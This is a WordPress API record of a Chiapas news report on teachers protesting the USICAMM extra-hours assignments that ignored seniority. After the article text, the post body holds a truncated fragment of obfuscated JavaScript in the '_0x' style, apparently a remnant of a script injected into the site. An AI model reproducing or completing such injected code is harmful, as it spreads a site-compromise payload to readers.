{"id":13178,"date":"2023-12-12T04:15:18","date_gmt":"2023-12-12T04:15:18","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13178"},"modified":"2023-12-12T04:15:19","modified_gmt":"2023-12-12T04:15:19","slug":"desplazan-a-docentes-con-antiguedad-con-ley-usicam","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13178","title":{"rendered":"Desplazan a docentes con antig\u00fcedad, con ley USICAM"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702354430617-1024x768.jpg\" alt=\"\" class=\"wp-image-13179\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702354430617-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702354430617-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702354430617-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702354430617.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.11 de diciembre de 2023. Tuxtla Guti\u00e9rrez.- Docentes del nivel Secundarias T\u00e9cnicas realizaron una protesta en las instalaciones de la Subsecretar\u00eda de Educaci\u00f3n Federalizada, para denunciar p\u00fablicamente las afectaciones generadas por la implementaci\u00f3n de horas adicionales mediante la USICAMM, como parte de la Reforma Educativa en las que se no se tom\u00f3 en cuenta los criterios como antig\u00fcedad, dando prioridad a los de nuevo ingreso. Ezequiel Rubalcaba Duarte,  titular de la Secretar\u00eda de Trabajos y Conflictos del Nivel de Secundarias T\u00e9cnicas, de la Secci\u00f3n 7 del SNTE CNTE, dio a conocer que este proceso se llev\u00f3 a cabo el pasado 7 de diciembre, y afectaron un n\u00famero importante de docentes. \u201cSe vieron afectados compa\u00f1eros y compa\u00f1eras del Nivel de Secundarias T\u00e9cnicas, docentes de las academias y de Tecnolog\u00edas , en donde pr\u00e1cticamente hubo un ejercicio de horas adicionales donde no tomaron en cuenta a quienes tienen m\u00e1s antig\u00fcedad y beneficiaron a trabajadores de nuevo ingreso, es decir que nosotros seguimos exigiendo la Bilateralidad en los procesos, la instalaci\u00f3n de la comisi\u00f3n mixta de relaciones laborales entre la secci\u00f3n 7 y la Secretar\u00eda de Educaci\u00f3n que hasta el momento no existe\u201d, coment\u00f3. Precis\u00f3 que, con el viejo sistema de designaci\u00f3n de horas extras tampoco se condicionaba el turno, pod\u00eda extenderse en la ma\u00f1ana o en la tarde, seg\u00fan fuera la necesidad de los docentes y ahora no es as\u00ed. \u201cSi el docente da en la ma\u00f1ana, las horas extras ser\u00e1n en la tarde y viceversa, es decir es a contra tiempo, los procesos son muy cuadrados, los docentes no pueden reclamar, no pueden exponer violaci\u00f3n de derechos humanos, porque hay represiones\u201d, expres\u00f3. Los docentes dan a conocer que, con este sistema, se est\u00e1n violentando los derechos laborales de 650 maestros de este nivel. \u201cEstamos haciendo patente el descontento, de nuestros compa\u00f1eros, estamos realizando esta manifestaci\u00f3n, debido a varias anomal\u00edas, existe adeudos desde el 2015, omisi\u00f3n de claves, docentes que cobran con otra clave, claves no afines es decir que no corresponde a las materias que imparten, entre otras\u201d, coment\u00f3. Los docentes, continuar\u00e1n con estas protestas para defender estos derechos laborales, hasta que, las autoridades atiendan estas demandas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores.11 de diciembre de 2023. Tuxtla Guti\u00e9rrez.- Docentes del nivel Secundarias T\u00e9cnicas realizaron una protesta en las instalaciones de la Subsecretar\u00eda de Educaci\u00f3n Federalizada, para denunciar p\u00fablicamente las afectaciones generadas por la implementaci\u00f3n de horas adicionales mediante la USICAMM, como parte de la Reforma Educativa en las que se no se tom\u00f3 en cuenta &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13179,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-13178","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13178","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13178"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13178\/revisions"}],"predecessor-version":[{"id":13180,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13178\/revisions\/13180"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13179"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13178"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13178"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13178"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}